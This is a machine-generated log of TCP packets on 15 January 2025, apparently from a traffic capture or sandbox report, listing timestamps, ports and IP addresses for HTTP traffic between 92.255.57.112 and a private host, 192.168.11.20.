                                                                                                                                                        Jan 15, 2025 10:18:39.710108995 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.710233927 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.710311890 CET4977180192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.710355997 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.710509062 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.710534096 CET4977180192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.710597038 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.710761070 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.710814953 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.710819006 CET4977180192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.710941076 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.711014032 CET4977180192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.711046934 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.711164951 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.711297035 CET4977180192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.711311102 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.711443901 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.711544991 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.711571932 CET4977180192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.711632967 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.711750031 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.711817980 CET4977180192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.711867094 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.711899042 CET4977180192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.712012053 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.712100983 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.712218046 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.712250948 CET4977180192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.712363005 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.712398052 CET4977180192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.712450981 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.712565899 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.712688923 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.712701082 CET4977180192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.712811947 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.712891102 CET4977180192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.712924004 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.713038921 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.713130951 CET4977180192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.713161945 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.713274956 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.713390112 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.713463068 CET4977180192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.713515043 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.713623047 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.713664055 CET4977180192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.713774920 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.713782072 CET4977180192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.713896990 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.714020967 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.714095116 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.714104891 CET4977180192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.714225054 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.714302063 CET4977180192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.714323044 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.714468956 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.714483023 CET4977180192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.714560986 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.714674950 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.714745045 CET4977180192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.714792967 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.714920998 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.714936972 CET4977180192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.715080023 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.715171099 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.715225935 CET4977180192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.715274096 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.715384007 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.715420961 CET4977180192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.715496063 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.715610981 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.715655088 CET4977180192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.715775013 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.715842009 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.715944052 CET4977180192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.715959072 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.716085911 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.716192007 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.716212034 CET4977180192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.716317892 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.716361046 CET4977180192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.716475010 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.716542959 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.716658115 CET4977180192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.716660023 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.716778994 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.716826916 CET4977180192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.716938972 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.717016935 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.717087984 CET4977180192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.717139006 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.717247009 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.717331886 CET4977180192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.717363119 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.717479944 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.717505932 CET4977180192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.717616081 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.717713118 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.717833042 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.717864990 CET4977180192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.717978001 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.717982054 CET4977180192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.718095064 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.718333006 CET4977180192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.821235895 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.821283102 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.821468115 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.821548939 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.821624041 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.821666002 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.821780920 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.821891069 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.821979046 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.822040081 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.822089911 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.822174072 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.822307110 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.822307110 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.822351933 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.822427034 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.822470903 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.822546005 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.822637081 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.822642088 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.822808981 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.822810888 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.822871923 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.822985888 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.823103905 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.823156118 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.823244095 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.823323965 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.823380947 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.823538065 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.823617935 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.823654890 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.823699951 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.823807001 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.823827982 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.823945999 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.824038029 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.824156046 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.824304104 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.824388981 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.824505091 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.824623108 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.824738979 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.824856997 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.824857950 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.824856997 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.824981928 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.825018883 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.825018883 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.825139046 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.825216055 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.825326920 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.825335026 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.825449944 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.825508118 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.825560093 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.825675011 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.825678110 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.825797081 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.825849056 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.825963974 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.826029062 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.826148033 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.826184988 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.826301098 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.826358080 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.826390982 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.826494932 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.826612949 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.826695919 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.826728106 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.826844931 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.826864958 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.826978922 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.827105999 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.827204943 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.827225924 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.827356100 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.827431917 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.827544928 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.827544928 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.827548981 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.827665091 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.827784061 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.827884912 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.827903032 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.828056097 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.828058958 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.828217983 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.828226089 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.828250885 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.828382015 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.828394890 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.828531981 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.828599930 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.828716040 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.828735113 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.828847885 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.828953028 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.829070091 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.829076052 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.829181910 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.829248905 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.829303026 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.829415083 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.829421043 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.829539061 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.829587936 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.829699993 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.829771996 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.829890966 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.829927921 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.830043077 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.830097914 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.830117941 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.830241919 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.830265045 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.830374002 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.830475092 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.830590010 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.830605030 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.830717087 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.830777884 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.830832958 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.830939054 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.831056118 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.831115961 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.831171989 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.831285000 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.831290007 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.831410885 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.831454992 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.831566095 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.831640959 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.831758022 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.831876993 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.831990957 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.832113981 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.832134962 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.832135916 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.832250118 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.832308054 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.832340956 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.832458973 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.832474947 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.832592010 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.832695007 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.832809925 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.832817078 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.832962036 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.833069086 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.833184958 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.833301067 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.833395958 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.833513021 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.833628893 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.833745956 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.833872080 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.833980083 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.834005117 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.834151030 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.834175110 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.834239960 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.834345102 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.834391117 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.834450960 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.834564924 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.834566116 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.834683895 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.834737062 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.834817886 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.834918976 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.835032940 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.835073948 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.835153103 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.835244894 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.835314989 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.835464001 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.835503101 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.835587025 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.835587025 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.835628033 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.835737944 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.835753918 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.835947990 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.835972071 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.836086035 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.836093903 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.836266994 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.836296082 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.836330891 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.836478949 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.836558104 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.836606979 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.836672068 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.836774111 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.836790085 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.836905956 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.836946964 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.837059021 CET804977292.255.57.112192.168.11.20
